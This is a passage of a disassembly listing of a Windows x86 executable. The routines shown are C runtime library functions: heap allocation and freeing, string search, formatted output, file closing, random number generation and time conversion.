		retn	4

; =============== S U B	R O U T	I N E =======================================



sub_4035A5	proc near		; CODE XREF: sub_40BFC7+12Dp

arg_0		= dword	ptr  4

		mov	eax, [esp+arg_0]
		add	ecx, 9
		push	ecx
		add	eax, 9
		push	eax
		call	sub_408590
		neg	eax
		pop	ecx
		sbb	eax, eax
		pop	ecx
		inc	eax
		retn	4
sub_4035A5	endp


; =============== S U B	R O U T	I N E =======================================



sub_4035C0	proc near		; CODE XREF: sub_4035D9+3Bp
		push	esi
		push	1
		push	offset off_424048
		mov	esi, ecx
		call	sub_4031E8
		mov	dword ptr [esi], offset	off_41E334
		mov	eax, esi
		pop	esi
		retn
sub_4035C0	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_4035D9	proc near		; CODE XREF: sub_401291+5p
					; sub_401395+5p ...

var_C		= dword	ptr -0Ch
arg_0		= dword	ptr  8

		push	ebp
		mov	ebp, esp
		sub	esp, 0Ch
		jmp	short loc_4035EE
; ---------------------------------------------------------------------------

loc_4035E1:				; CODE XREF: sub_4035D9+20j
		push	[ebp+arg_0]
		call	sub_408622
		test	eax, eax
		pop	ecx
		jz	short loc_4035FD

loc_4035EE:				; CODE XREF: sub_4035D9+6j
		push	[ebp+arg_0]
		call	sub_403C6E
		test	eax, eax
		pop	ecx
		jz	short loc_4035E1
		leave
		retn
; ---------------------------------------------------------------------------

loc_4035FD:				; CODE XREF: sub_4035D9+13j
		test	byte ptr dword_427DF0, 1
		mov	esi, offset dword_427DE4
		jnz	short loc_403624
		or	dword_427DF0, 1
		mov	ecx, esi
		call	sub_4035C0
		push	offset loc_41D275
		call	sub_4033AF
		pop	ecx

loc_403624:				; CODE XREF: sub_4035D9+30j
		push	esi
		lea	ecx, [ebp+var_C]
		call	sub_403200
		push	offset dword_422F30
		lea	eax, [ebp+var_C]
		push	eax
		mov	[ebp+var_C], offset off_41E334
		call	sub_40477B
		int	3		; Trap to Debugger
sub_4035D9	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_403643	proc near		; CODE XREF: sub_419D3D+84p
					; sub_419D3D+102p ...

var_20		= dword	ptr -20h
var_1C		= dword	ptr -1Ch
var_18		= dword	ptr -18h
var_14		= dword	ptr -14h
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= byte ptr  10h

		push	ebp
		mov	ebp, esp
		sub	esp, 20h
		push	ebx
		xor	ebx, ebx
		cmp	[ebp+arg_4], ebx
		jnz	short loc_40366E

loc_403651:				; CODE XREF: sub_403643+30j
		call	sub_405D93
		push	ebx
		push	ebx
		push	ebx
		push	ebx
		push	ebx
		mov	dword ptr [eax], 16h
		call	sub_4034C7
		add	esp, 14h
		or	eax, 0FFFFFFFFh
		jmp	short loc_4036BB
; ---------------------------------------------------------------------------

loc_40366E:				; CODE XREF: sub_403643+Cj
		mov	eax, [ebp+arg_0]
		cmp	eax, ebx
		jz	short loc_403651
		push	esi
		mov	[ebp+var_18], eax
		mov	[ebp+var_20], eax
		lea	eax, [ebp+arg_8]
		push	eax
		push	ebx
		push	[ebp+arg_4]
		lea	eax, [ebp+var_20]
		push	eax
		mov	[ebp+var_1C], 7FFFFFFFh
		mov	[ebp+var_14], 42h
		call	sub_406F97
		add	esp, 10h
		dec	[ebp+var_1C]
		mov	esi, eax
		js	short loc_4036AC
		mov	eax, [ebp+var_20]
		mov	[eax], bl
		jmp	short loc_4036B8
; ---------------------------------------------------------------------------

loc_4036AC:				; CODE XREF: sub_403643+60j
		lea	eax, [ebp+var_20]
		push	eax
		push	ebx
		call	sub_406D96
		pop	ecx
		pop	ecx

loc_4036B8:				; CODE XREF: sub_403643+67j
		mov	eax, esi
		pop	esi

loc_4036BB:				; CODE XREF: sub_403643+29j
		pop	ebx
		leave
		retn
sub_403643	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_4036BE	proc near		; CODE XREF: sub_403782+Ap

var_1C		= dword	ptr -1Ch
ms_exc		= CPPEH_RECORD ptr -18h
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h

		push	0Ch
		push	offset dword_4228B8
		call	__SEH_prolog4
		xor	ebx, ebx
		mov	[ebp+var_1C], ebx
		xor	eax, eax
		mov	edi, [ebp+arg_0]
		cmp	edi, ebx
		setnz	al
		cmp	eax, ebx
		jnz	short loc_4036F9

loc_4036DD:				; CODE XREF: sub_4036BE+47j
					; sub_4036BE+52j
		call	sub_405D93
		mov	dword ptr [eax], 16h
		push	ebx
		push	ebx
		push	ebx
		push	ebx
		push	ebx
		call	sub_4034C7
		add	esp, 14h

loc_4036F5:				; CODE XREF: sub_4036BE+6Bj
					; sub_4036BE+92j
		xor	eax, eax
		jmp	short loc_403772
; ---------------------------------------------------------------------------

loc_4036F9:				; CODE XREF: sub_4036BE+1Dj
		xor	eax, eax
		mov	esi, [ebp+arg_4]
		cmp	esi, ebx
		setnz	al
		cmp	eax, ebx
		jz	short loc_4036DD
		xor	eax, eax
		cmp	[esi], bl
		setnz	al
		cmp	eax, ebx
		jz	short loc_4036DD
		call	sub_408A61
		mov	[ebp+arg_0], eax
		cmp	eax, ebx
		jnz	short loc_40372B
		call	sub_405D93
		mov	dword ptr [eax], 18h
		jmp	short loc_4036F5
; ---------------------------------------------------------------------------

loc_40372B:				; CODE XREF: sub_4036BE+5Ej
		mov	[ebp+ms_exc.disabled], ebx
		cmp	[edi], bl
		jnz	short loc_403752
		call	sub_405D93
		mov	dword ptr [eax], 16h
		push	0FFFFFFFEh
		lea	eax, [ebp+ms_exc.prev_er]
		push	eax
		push	offset dword_424064
		call	sub_408B88
		add	esp, 0Ch
		jmp	short loc_4036F5
; ---------------------------------------------------------------------------

loc_403752:				; CODE XREF: sub_4036BE+72j
		push	eax
		push	[ebp+arg_8]
		push	esi
		push	edi
		call	sub_4087BF
		add	esp, 10h
		mov	[ebp+var_1C], eax
		mov	[ebp+ms_exc.disabled], 0FFFFFFFEh
		call	sub_403778
		mov	eax, [ebp+var_1C]

loc_403772:				; CODE XREF: sub_4036BE+39j
		call	__SEH_epilog4
		retn
sub_4036BE	endp


; =============== S U B	R O U T	I N E =======================================



sub_403778	proc near		; CODE XREF: sub_4036BE+ACp
					; DATA XREF: jlrllt49:004228D0o
		push	dword ptr [ebp+8]
		call	sub_40876D
		pop	ecx
		retn
sub_403778	endp


; =============== S U B	R O U T	I N E =======================================



sub_403782	proc near		; CODE XREF: sub_419D3D+116p
					; sub_41BD8A+4Ep

arg_0		= dword	ptr  4
arg_4		= dword	ptr  8

		push	40h
		push	[esp+4+arg_4]
		push	[esp+8+arg_0]
		call	sub_4036BE
		add	esp, 0Ch
		retn
sub_403782	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_403795	proc near		; CODE XREF: sub_419D3D+131p

var_1C		= dword	ptr -1Ch
ms_exc		= CPPEH_RECORD ptr -18h
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= byte ptr  10h

		push	0Ch
		push	offset dword_4228D8
		call	__SEH_prolog4
		xor	ebx, ebx
		mov	[ebp+var_1C], ebx
		xor	eax, eax
		mov	esi, [ebp+arg_0]
		cmp	esi, ebx
		setnz	al
		cmp	eax, ebx
		jnz	short loc_4037D4

loc_4037B4:				; CODE XREF: sub_403795+49j
		call	sub_405D93
		mov	dword ptr [eax], 16h
		push	ebx
		push	ebx
		push	ebx
		push	ebx
		push	ebx
		call	sub_4034C7
		add	esp, 14h
		or	eax, 0FFFFFFFFh
		jmp	loc_4038D4
; ---------------------------------------------------------------------------

loc_4037D4:				; CODE XREF: sub_403795+1Dj
		xor	eax, eax
		cmp	[ebp+arg_4], ebx
		setnz	al
		cmp	eax, ebx
		jz	short loc_4037B4
		mov	[ebp+arg_0], esi
		push	esi
		call	sub_40871B
		pop	ecx
		mov	[ebp+ms_exc.disabled], ebx
		test	byte ptr [esi+0Ch], 40h
		jnz	loc_40389D
		push	esi
		call	sub_408FE0
		pop	ecx
		cmp	eax, 0FFFFFFFFh
		jz	short loc_403831
		push	esi
		call	sub_408FE0
		pop	ecx
		cmp	eax, 0FFFFFFFEh
		jz	short loc_403831
		push	esi
		call	sub_408FE0
		sar	eax, 5
		lea	edi, ds:437700h[eax*4]
		push	esi
		call	sub_408FE0
		pop	ecx
		pop	ecx
		and	eax, 1Fh
		imul	eax, 28h
		add	eax, [edi]
		jmp	short loc_403836
; ---------------------------------------------------------------------------

loc_403831:				; CODE XREF: sub_403795+6Cj
					; sub_403795+78j
		mov	eax, offset dword_424BD0

loc_403836:				; CODE XREF: sub_403795+9Aj
		test	byte ptr [eax+24h], 7Fh
		jnz	short loc_403881
		push	esi
		call	sub_408FE0
		pop	ecx
		cmp	eax, 0FFFFFFFFh
		jz	short loc_403876
		push	esi
		call	sub_408FE0
		pop	ecx
		cmp	eax, 0FFFFFFFEh
		jz	short loc_403876
		push	esi
		call	sub_408FE0
		sar	eax, 5
		lea	edi, ds:437700h[eax*4]
		push	esi
		call	sub_408FE0
		pop	ecx
		pop	ecx
		and	eax, 1Fh
		imul	eax, 28h
		add	eax, [edi]
		jmp	short loc_40387B
; ---------------------------------------------------------------------------

loc_403876:				; CODE XREF: sub_403795+B1j
					; sub_403795+BDj
		mov	eax, offset dword_424BD0

loc_40387B:				; CODE XREF: sub_403795+DFj
		test	byte ptr [eax+24h], 80h
		jz	short loc_40389D

loc_403881:				; CODE XREF: sub_403795+A5j
		call	sub_405D93
		mov	dword ptr [eax], 16h
		push	ebx
		push	ebx
		push	ebx
		push	ebx
		push	ebx
		call	sub_4034C7
		add	esp, 14h
		or	[ebp+var_1C], 0FFFFFFFFh

loc_40389D:				; CODE XREF: sub_403795+5Cj
					; sub_403795+EAj
		cmp	[ebp+var_1C], ebx
		jnz	short loc_4038C5
		push	esi
		call	sub_408CDB
		mov	edi, eax
		lea	eax, [ebp+arg_8]
		push	eax
		push	ebx
		push	[ebp+arg_4]
		push	esi
		call	sub_406F97
		mov	[ebp+var_1C], eax
		push	esi
		push	edi
		call	sub_408D71
		add	esp, 1Ch

loc_4038C5:				; CODE XREF: sub_403795+10Bj
		mov	[ebp+ms_exc.disabled], 0FFFFFFFEh
		call	sub_4038DA
		mov	eax, [ebp+var_1C]

loc_4038D4:				; CODE XREF: sub_403795+3Aj
		call	__SEH_epilog4
		retn
sub_403795	endp


; =============== S U B	R O U T	I N E =======================================



sub_4038DA	proc near		; CODE XREF: sub_403795+137p
					; DATA XREF: jlrllt49:004228F0o
		push	dword ptr [ebp+8]
		call	sub_40876D
		pop	ecx
		retn
sub_4038DA	endp


; =============== S U B	R O U T	I N E =======================================



sub_4038E4	proc near		; CODE XREF: sub_41810B+4Fp
					; sub_41B423+20Fp

arg_0		= dword	ptr  4

		call	sub_40595D
		mov	ecx, [esp+arg_0]
		mov	[eax+14h], ecx
		retn
sub_4038E4	endp


; =============== S U B	R O U T	I N E =======================================



sub_4038F1	proc near		; CODE XREF: sub_41810B:loc_418287p
					; sub_419D3D+A7p ...
		call	sub_40595D
		mov	ecx, [eax+14h]
		imul	ecx, 343FDh
		add	ecx, 269EC3h
		mov	[eax+14h], ecx
		mov	eax, ecx
		shr	eax, 10h
		and	eax, 7FFFh
		retn
sub_4038F1	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_403913	proc near		; CODE XREF: sub_4039C4+12p

var_20		= dword	ptr -20h
var_1C		= dword	ptr -1Ch
var_18		= dword	ptr -18h
var_14		= dword	ptr -14h
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h
arg_C		= dword	ptr  14h
arg_10		= dword	ptr  18h

		push	ebp
		mov	ebp, esp
		sub	esp, 20h
		push	ebx
		xor	ebx, ebx
		cmp	[ebp+arg_8], ebx
		jnz	short loc_403941
		call	sub_405D93
		push	ebx
		push	ebx
		push	ebx
		push	ebx
		push	ebx
		mov	dword ptr [eax], 16h
		call	sub_4034C7
		add	esp, 14h
		or	eax, 0FFFFFFFFh
		jmp	loc_4039C1
; ---------------------------------------------------------------------------

loc_403941:				; CODE XREF: sub_403913+Cj
		mov	ecx, [ebp+arg_4]
		cmp	ecx, ebx
		push	esi
		mov	esi, [ebp+arg_0]
		jz	short loc_40396D
		cmp	esi, ebx
		jnz	short loc_40396D
		call	sub_405D93
		push	ebx
		push	ebx
		push	ebx
		push	ebx
		push	ebx
		mov	dword ptr [eax], 16h
		call	sub_4034C7
		add	esp, 14h
		or	eax, 0FFFFFFFFh
		jmp	short loc_4039C0
; ---------------------------------------------------------------------------

loc_40396D:				; CODE XREF: sub_403913+37j
					; sub_403913+3Bj
		mov	eax, 7FFFFFFFh
		cmp	ecx, eax
		mov	[ebp+var_1C], eax
		ja	short loc_40397C
		mov	[ebp+var_1C], ecx

loc_40397C:				; CODE XREF: sub_403913+64j
		push	edi
		push	[ebp+arg_10]
		lea	eax, [ebp+var_20]
		push	[ebp+arg_C]
		mov	[ebp+var_14], 42h
		push	[ebp+arg_8]
		mov	[ebp+var_18], esi
		push	eax
		mov	[ebp+var_20], esi
		call	sub_406F97
		add	esp, 10h
		cmp	esi, ebx
		mov	edi, eax
		jz	short loc_4039BF
		dec	[ebp+var_1C]
		js	short loc_4039B1
		mov	eax, [ebp+var_20]
		mov	[eax], bl
		jmp	short loc_4039BD
; ---------------------------------------------------------------------------

loc_4039B1:				; CODE XREF: sub_403913+95j
		lea	eax, [ebp+var_20]
		push	eax
		push	ebx
		call	sub_406D96
		pop	ecx
		pop	ecx

loc_4039BD:				; CODE XREF: sub_403913+9Cj
		mov	eax, edi

loc_4039BF:				; CODE XREF: sub_403913+90j
		pop	edi

loc_4039C0:				; CODE XREF: sub_403913+58j
		pop	esi

loc_4039C1:				; CODE XREF: sub_403913+29j
		pop	ebx
		leave
		retn
sub_403913	endp


; =============== S U B	R O U T	I N E =======================================



sub_4039C4	proc near		; CODE XREF: sub_417F4C+3Ep
					; sub_417FE1+7Cp ...

arg_0		= dword	ptr  4
arg_4		= dword	ptr  8
arg_8		= dword	ptr  0Ch
arg_C		= dword	ptr  10h

		push	[esp+arg_C]
		push	0
		push	[esp+8+arg_8]
		push	[esp+0Ch+arg_4]
		push	[esp+10h+arg_0]
		call	sub_403913
		add	esp, 14h
		retn
sub_4039C4	endp


; =============== S U B	R O U T	I N E =======================================



sub_4039DF	proc near		; CODE XREF: sub_403A52+5Ap

arg_0		= dword	ptr  4

		push	ebx
		push	esi
		mov	esi, [esp+8+arg_0]
		push	edi
		xor	edi, edi
		or	ebx, 0FFFFFFFFh
		cmp	esi, edi
		jnz	short loc_403A0C
		call	sub_405D93
		push	edi
		push	edi
		push	edi
		push	edi
		push	edi
		mov	dword ptr [eax], 16h
		call	sub_4034C7
		add	esp, 14h
		or	eax, 0FFFFFFFFh
		jmp	short loc_403A4E
; ---------------------------------------------------------------------------

loc_403A0C:				; CODE XREF: sub_4039DF+Ej
		test	byte ptr [esi+0Ch], 83h
		jz	short loc_403A49
		push	esi
		call	sub_40919A
		push	esi
		mov	ebx, eax
		call	sub_40916E
		push	esi
		call	sub_408FE0
		push	eax
		call	sub_4090A1
		add	esp, 10h
		test	eax, eax
		jge	short loc_403A38
		or	ebx, 0FFFFFFFFh
		jmp	short loc_403A49
; ---------------------------------------------------------------------------

loc_403A38:				; CODE XREF: sub_4039DF+52j
		mov	eax, [esi+1Ch]
		cmp	eax, edi
		jz	short loc_403A49
		push	eax
		call	sub_403B91
		pop	ecx
		mov	[esi+1Ch], edi

loc_403A49:				; CODE XREF: sub_4039DF+31j
					; sub_4039DF+57j ...
		mov	[esi+0Ch], edi
		mov	eax, ebx

loc_403A4E:				; CODE XREF: sub_4039DF+2Bj
		pop	edi
		pop	esi
		pop	ebx
		retn
sub_4039DF	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_403A52	proc near		; CODE XREF: sub_40E593+43p
					; sub_419D3D+137p ...

var_1C		= dword	ptr -1Ch
ms_exc		= CPPEH_RECORD ptr -18h
arg_0		= dword	ptr  8

		push	0Ch
		push	offset dword_4228F8
		call	__SEH_prolog4
		or	[ebp+var_1C], 0FFFFFFFFh
		xor	eax, eax
		mov	esi, [ebp+arg_0]
		xor	edi, edi
		cmp	esi, edi
		setnz	al
		cmp	eax, edi
		jnz	short loc_403A8F
		call	sub_405D93
		mov	dword ptr [eax], 16h
		push	edi
		push	edi
		push	edi
		push	edi
		push	edi
		call	sub_4034C7
		add	esp, 14h
		or	eax, 0FFFFFFFFh
		jmp	short loc_403A9B
; ---------------------------------------------------------------------------

loc_403A8F:				; CODE XREF: sub_403A52+1Ej
		test	byte ptr [esi+0Ch], 40h
		jz	short loc_403AA1
		mov	[esi+0Ch], edi

loc_403A98:				; CODE XREF: sub_403A52+6Fj
		mov	eax, [ebp+var_1C]

loc_403A9B:				; CODE XREF: sub_403A52+3Bj
		call	__SEH_epilog4
		retn
; ---------------------------------------------------------------------------

loc_403AA1:				; CODE XREF: sub_403A52+41j
		push	esi
		call	sub_40871B
		pop	ecx
		mov	[ebp+ms_exc.disabled], edi
		push	esi
		call	sub_4039DF
		pop	ecx
		mov	[ebp+var_1C], eax
		mov	[ebp+ms_exc.disabled], 0FFFFFFFEh
		call	sub_403AC6
		jmp	short loc_403A98
sub_403A52	endp

; ---------------------------------------------------------------------------
		mov	esi, [ebp+8]

; =============== S U B	R O U T	I N E =======================================



sub_403AC6	proc near		; CODE XREF: sub_403A52+6Ap
		push	esi
		call	sub_40876D
		pop	ecx
		retn
sub_403AC6	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_403ACE	proc near		; CODE XREF: .text:00419F40p
					; sub_419F7B+13p

var_8		= dword	ptr -8
var_4		= dword	ptr -4
arg_0		= dword	ptr  8

		push	ebp
		mov	ebp, esp
		push	ecx
		push	ecx
		lea	eax, [ebp+var_8]
		push	eax
		call	ds:off_41E1A0
		mov	eax, [ebp+var_8]
		mov	ecx, [ebp+var_4]
		push	0
		add	eax, 2AC18000h
		push	989680h
		adc	ecx, 0FE624E21h
		push	ecx
		push	eax
		call	sub_409330
		mov	ecx, [ebp+arg_0]
		test	ecx, ecx
		jz	short locret_403B08
		mov	[ecx], eax
		mov	[ecx+4], edx

locret_403B08:				; CODE XREF: sub_403ACE+33j
		leave
		retn
sub_403ACE	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_403B0A	proc near		; CODE XREF: sub_403B72+15p

var_20		= dword	ptr -20h
var_1C		= dword	ptr -1Ch
var_18		= dword	ptr -18h
var_14		= dword	ptr -14h
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h
arg_C		= dword	ptr  14h

		push	ebp
		mov	ebp, esp
		sub	esp, 20h
		push	edi
		push	esi
		call	sub_4046F0
		xor	edi, edi
		cmp	esi, edi
		pop	ecx
		jnz	short loc_403B3B

loc_403B1E:				; CODE XREF: sub_403B0A+34j
		call	sub_405D93
		push	edi
		push	edi
		push	edi
		push	edi
		push	edi
		mov	dword ptr [eax], 16h
		call	sub_4034C7
		add	esp, 14h
		or	eax, 0FFFFFFFFh
		jmp	short loc_403B6F
; ---------------------------------------------------------------------------

loc_403B3B:				; CODE XREF: sub_403B0A+12j
		cmp	[ebp+arg_4], edi
		jz	short loc_403B1E
		mov	ecx, 7FFFFFFFh
		cmp	eax, ecx
		mov	[ebp+var_14], 49h
		mov	[ebp+var_18], esi
		mov	[ebp+var_20], esi
		mov	[ebp+var_1C], ecx
		ja	short loc_403B5C
		mov	[ebp+var_1C], eax

loc_403B5C:				; CODE XREF: sub_403B0A+4Dj
		push	[ebp+arg_C]
		lea	eax, [ebp+var_20]
		push	[ebp+arg_8]
		push	[ebp+arg_4]
		push	eax
		call	[ebp+arg_0]
		add	esp, 10h

loc_403B6F:				; CODE XREF: sub_403B0A+2Fj
		pop	edi
		leave
		retn
sub_403B0A	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_403B72	proc near		; CODE XREF: .text:004026D2p
					; .text:0040280Fp ...

arg_0		= dword	ptr  4
arg_4		= dword	ptr  8
arg_8		= byte ptr  0Ch

		push	esi
		mov	esi, [esp+4+arg_0]
		lea	eax, [esp+4+arg_8]
		push	eax
		push	0
		push	[esp+0Ch+arg_4]
		push	offset sub_409427
		call	sub_403B0A
		add	esp, 10h
		pop	esi
		retn
sub_403B72	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_403B91	proc near		; CODE XREF: sub_403258+Fp sub_4034FBj ...

var_1C		= dword	ptr -1Ch
ms_exc		= CPPEH_RECORD ptr -18h
arg_0		= dword	ptr  8

; FUNCTION CHUNK AT 00403BF0 SIZE 0000002F BYTES

		push	0Ch
		push	offset dword_422918
		call	__SEH_prolog4
		mov	esi, [ebp+arg_0]
		test	esi, esi
		jz	short loc_403C19
		cmp	dword_438854, 3
		jnz	short loc_403BF0
		push	4
		call	sub_405FB7
		pop	ecx
		and	[ebp+ms_exc.disabled], 0
		push	esi
		call	sub_4060E5
		pop	ecx
		mov	[ebp+var_1C], eax
		test	eax, eax
		jz	short loc_403BD0
		push	esi
		push	eax
		call	sub_406110
		pop	ecx
		pop	ecx

loc_403BD0:				; CODE XREF: sub_403B91+34j
		mov	[ebp+ms_exc.disabled], 0FFFFFFFEh
		call	sub_403BE7
		cmp	[ebp+var_1C], 0
		jnz	short loc_403C19
		push	[ebp+arg_0]
		jmp	short loc_403BF1
sub_403B91	endp


; =============== S U B	R O U T	I N E =======================================



sub_403BE7	proc near		; CODE XREF: sub_403B91+46p
					; DATA XREF: jlrllt49:00422930o
		push	4
		call	sub_405EDF
		pop	ecx
		retn
sub_403BE7	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_403B91

loc_403BF0:				; CODE XREF: sub_403B91+1Aj
		push	esi

loc_403BF1:				; CODE XREF: sub_403B91+54j
		push	0
		push	dword_4282C8
		call	ds:dword_41E108	; RtlFreeHeap
		test	eax, eax
		jnz	short loc_403C19
		call	sub_405D93
		mov	esi, eax
		call	ds:dword_41E0EC	; RtlGetLastWin32Error
		push	eax
		call	sub_405D58
		mov	[esi], eax
		pop	ecx

loc_403C19:				; CODE XREF: sub_403B91+11j
					; sub_403B91+4Fj ...
		call	__SEH_epilog4
		retn
; END OF FUNCTION CHUNK	FOR sub_403B91

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_403C1F	proc near		; CODE XREF: sub_403C6E+59p

var_1C		= dword	ptr -1Ch
ms_exc		= CPPEH_RECORD ptr -18h
arg_0		= dword	ptr  8

		push	0Ch
		push	offset dword_422938
		call	__SEH_prolog4
		and	[ebp+var_1C], 0
		mov	esi, [ebp+arg_0]
		cmp	esi, dword_438844
		ja	short loc_403C5C
		push	4
		call	sub_405FB7
		pop	ecx
		and	[ebp+ms_exc.disabled], 0
		push	esi
		call	sub_4068B9
		pop	ecx
		mov	[ebp+var_1C], eax
		mov	[ebp+ms_exc.disabled], 0FFFFFFFEh
		call	sub_403C65

loc_403C5C:				; CODE XREF: sub_403C1F+19j
		mov	eax, [ebp+var_1C]
		call	__SEH_epilog4
		retn
sub_403C1F	endp


; =============== S U B	R O U T	I N E =======================================



sub_403C65	proc near		; CODE XREF: sub_403C1F+38p
					; DATA XREF: jlrllt49:00422950o
		push	4
		call	sub_405EDF
		pop	ecx
		retn
sub_403C65	endp


; =============== S U B	R O U T	I N E =======================================



sub_403C6E	proc near		; CODE XREF: sub_40319A+1Fp
					; sub_403200+2Ap ...

arg_0		= dword	ptr  4

		push	ebp
		mov	ebp, [esp+4+arg_0]
		cmp	ebp, 0FFFFFFE0h
		ja	loc_403D1B
		push	ebx
		mov	ebx, ds:dword_41E110
		push	esi
		push	edi

loc_403C85:				; CODE XREF: sub_403C6E+94j
		xor	esi, esi
		cmp	dword_4282C8, esi
		mov	edi, ebp
		jnz	short loc_403CA9
		call	sub_40A214
		push	1Eh
		call	sub_40A074
		push	0FFh
		call	sub_407E67
		pop	ecx
		pop	ecx

loc_403CA9:				; CODE XREF: sub_403C6E+21j
		mov	eax, dword_438854
		cmp	eax, 1
		jnz	short loc_403CC1
		cmp	ebp, esi
		jz	short loc_403CBB
		mov	eax, ebp
		jmp	short loc_403CBE
; ---------------------------------------------------------------------------

loc_403CBB:				; CODE XREF: sub_403C6E+47j
		xor	eax, eax
		inc	eax

loc_403CBE:				; CODE XREF: sub_403C6E+4Bj
		push	eax
		jmp	short loc_403CDF
; ---------------------------------------------------------------------------

loc_403CC1:				; CODE XREF: sub_403C6E+43j
		cmp	eax, 3
		jnz	short loc_403CD1
		push	ebp
		call	sub_403C1F
		cmp	eax, esi
		pop	ecx
		jnz	short loc_403CE8

loc_403CD1:				; CODE XREF: sub_403C6E+56j
		cmp	ebp, esi
		jnz	short loc_403CD8
		xor	edi, edi
		inc	edi

loc_403CD8:				; CODE XREF: sub_403C6E+65j
		add	edi, 0Fh
		and	edi, 0FFFFFFF0h
		push	edi

loc_403CDF:				; CODE XREF: sub_403C6E+51j
		push	esi
		push	dword_4282C8
		call	ebx	; RtlAllocateHeap

loc_403CE8:				; CODE XREF: sub_403C6E+61j
		mov	esi, eax
		test	esi, esi
		jnz	short loc_403D14
		cmp	dword_42864C, eax
		push	0Ch
		pop	edi
		jz	short loc_403D06
		push	ebp
		call	sub_408622
		test	eax, eax
		pop	ecx
		jnz	short loc_403C85
		jmp	short loc_403D0D
; ---------------------------------------------------------------------------

loc_403D06:				; CODE XREF: sub_403C6E+89j
		call	sub_405D93
		mov	[eax], edi

loc_403D0D:				; CODE XREF: sub_403C6E+96j
		call	sub_405D93
		mov	[eax], edi

loc_403D14:				; CODE XREF: sub_403C6E+7Ej
		pop	edi
		mov	eax, esi
		pop	esi
		pop	ebx
		pop	ebp
		retn
; ---------------------------------------------------------------------------

loc_403D1B:				; CODE XREF: sub_403C6E+8j
		push	ebp
		call	sub_408622
		pop	ecx
		call	sub_405D93
		mov	dword ptr [eax], 0Ch
		xor	eax, eax
		pop	ebp
		retn
sub_403C6E	endp

; ---------------------------------------------------------------------------
		align 10h

; =============== S U B	R O U T	I N E =======================================



sub_403D40	proc near		; CODE XREF: sub_4184BD+84p
					; sub_41913F+1Bp ...

arg_0		= dword	ptr  4
arg_4		= dword	ptr  8

		mov	ecx, [esp+arg_4]
		push	edi
		push	ebx
		push	esi
		mov	dl, [ecx]
		mov	edi, [esp+0Ch+arg_0]
		test	dl, dl
		jz	short loc_403DC0
		mov	dh, [ecx+1]
		test	dh, dh
		jz	short loc_403DAD

loc_403D58:				; CODE XREF: sub_403D40+58j
					; sub_403D40+6Bj
		mov	esi, edi
		mov	ecx, [esp+0Ch+arg_4]
		mov	al, [edi]
		add	esi, 1
		cmp	al, dl
		jz	short loc_403D7E
		test	al, al
		jz	short loc_403D78

loc_403D6B:				; CODE XREF: sub_403D40+36j
		mov	al, [esi]
		add	esi, 1

loc_403D70:				; CODE XREF: sub_403D40+45j
		cmp	al, dl
		jz	short loc_403D7E
		test	al, al
		jnz	short loc_403D6B

loc_403D78:				; CODE XREF: sub_403D40+29j
		pop	esi
		pop	ebx
		pop	edi
		xor	eax, eax
		retn
; ---------------------------------------------------------------------------

loc_403D7E:				; CODE XREF: sub_403D40+25j
					; sub_403D40+32j
		mov	al, [esi]
		add	esi, 1
		cmp	al, dh
		jnz	short loc_403D70
		lea	edi, [esi-1]

loc_403D8A:				; CODE XREF: sub_403D40+69j
		mov	ah, [ecx+2]
		test	ah, ah
		jz	short loc_403DB9
		mov	al, [esi]
		add	esi, 2
		cmp	al, ah
		jnz	short loc_403D58
		mov	al, [ecx+3]
		test	al, al
		jz	short loc_403DB9
		mov	ah, [esi-1]
		add	ecx, 2
		cmp	al, ah
		jz	short loc_403D8A
		jmp	short loc_403D58
; ---------------------------------------------------------------------------

loc_403DAD:				; CODE XREF: sub_403D40+16j
		xor	eax, eax
		pop	esi
		pop	ebx
		pop	edi
		mov	al, dl
		jmp	loc_403DE6
; ---------------------------------------------------------------------------

loc_403DB9:				; CODE XREF: sub_403D40+4Fj
					; sub_403D40+5Fj
		lea	eax, [edi-1]
		pop	esi
		pop	ebx
		pop	edi
		retn
; ---------------------------------------------------------------------------

loc_403DC0:				; CODE XREF: sub_403D40+Fj
		mov	eax, edi
		pop	esi
		pop	ebx
		pop	edi
		retn
sub_403D40	endp

; ---------------------------------------------------------------------------
		align 10h
; START	OF FUNCTION CHUNK FOR sub_403DE0

loc_403DD0:				; CODE XREF: sub_403DE0+1Fj
		lea	eax, [edx-1]
		pop	ebx
		retn
; END OF FUNCTION CHUNK	FOR sub_403DE0
; ---------------------------------------------------------------------------
		align 10h

; =============== S U B	R O U T	I N E =======================================



sub_403DE0	proc near		; CODE XREF: sub_418FFF+Bp
					; sub_419016+35p ...

arg_0		= dword	ptr  4
arg_4		= byte ptr  8

; FUNCTION CHUNK AT 00403DD0 SIZE 00000005 BYTES

		xor	eax, eax
		mov	al, [esp+arg_4]

loc_403DE6:				; CODE XREF: sub_403D40+74j
		push	ebx
		mov	ebx, eax
		shl	eax, 8
		mov	edx, [esp+4+arg_0]
		test	edx, 3
		jz	short loc_403E0D

loc_403DF8:				; CODE XREF: sub_403DE0+2Bj
		mov	cl, [edx]
		add	edx, 1
		cmp	cl, bl
		jz	short loc_403DD0
		test	cl, cl
		jz	short loc_403E56
		test	edx, 3
		jnz	short loc_403DF8

loc_403E0D:				; CODE XREF: sub_403DE0+16j
		or	ebx, eax
		push	edi
		mov	eax, ebx
		shl	ebx, 10h
		push	esi
		or	ebx, eax

loc_403E18:				; CODE XREF: sub_403DE0+63j
